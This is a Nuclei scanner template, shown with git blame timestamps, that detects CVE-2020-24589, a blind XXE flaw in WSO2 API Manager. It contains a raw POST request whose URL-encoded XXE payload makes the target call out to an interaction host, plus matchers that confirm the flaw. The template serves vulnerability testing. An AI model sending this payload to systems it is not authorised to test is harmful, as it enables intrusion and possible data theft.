nuclei-templates/cves/2020/CVE-2020-24589.yaml

35 lines
985 B
YAML
Raw Normal View History

2021-10-16 00:37:03 +00:00
id: CVE-2020-24589
info:
name: WSO2 API Manager Blind XXE
author: lethargynavigator
2021-10-21 16:55:42 +00:00
severity: critical
2021-10-16 00:37:03 +00:00
description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XXE.
reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742
2021-10-21 16:55:42 +00:00
tags: cve,cve2020,wso2,xxe,oast
2021-10-16 00:37:03 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2020-24589
requests:
2021-10-21 15:02:55 +00:00
- raw:
- |
POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]>
2021-10-16 00:37:03 +00:00
matchers-condition: and
matchers:
- type: word
2021-10-21 15:02:55 +00:00
part: interactsh_protocol
2021-10-16 00:37:03 +00:00
words:
2021-10-21 16:55:42 +00:00
- "http"
- type: word
part: body
words:
- "Failed to install the generic artifact type"